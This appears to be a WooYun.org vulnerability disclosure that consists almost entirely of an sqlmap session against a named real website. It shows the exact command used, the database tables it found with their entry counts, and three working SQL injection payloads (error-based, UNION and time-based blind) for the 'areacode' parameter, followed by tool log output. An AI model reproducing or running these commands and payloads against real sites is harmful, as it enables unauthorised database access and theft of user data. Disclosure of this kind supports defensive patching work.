WooYun.org

sqlmap -u "http://romgame.gfan.com/index.php/gtphone?areacode=*" --dbms=MySQL --risk=3 --level=5 --count -D hd --threads=10

Database: hd
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| rom_act_log          | 50973   |
| rom_act_log_norepet  | 16045   |
| autumn_taste_log     | 1747    |
| autumn_draw_log      | 1161    |
| rom_cellphone        | 193     |
| autumn_draw_count    | 162     |
| rom_apply_info       | 110     |
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
    Payload: http://romgame.gfan.com:80/index.php/gtphone?areacode=-3398 OR (SELECT 3113 FROM(SELECT COUNT(*),CONCAT(0x7178736571,(SELECT (CASE WHEN (3113=3113) THEN 1 ELSE 0 END)),0x71626f7471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (random number) - 3 columns
    Payload: http://romgame.gfan.com:80/index.php/gtphone?areacode=-8998 UNION ALL SELECT 8335,8335,CONCAT(0x7178736571,0x6a765965564d414e516e,0x71626f7471)#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: http://romgame.gfan.com:80/index.php/gtphone?areacode=-2114 OR 3908=SLEEP(5)
---
[12:46:20] [INFO] testing MySQL
[12:46:21] [WARNING] automatically patching output having last char trimmed
[12:46:21] [INFO] confirming MySQL
[12:46:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0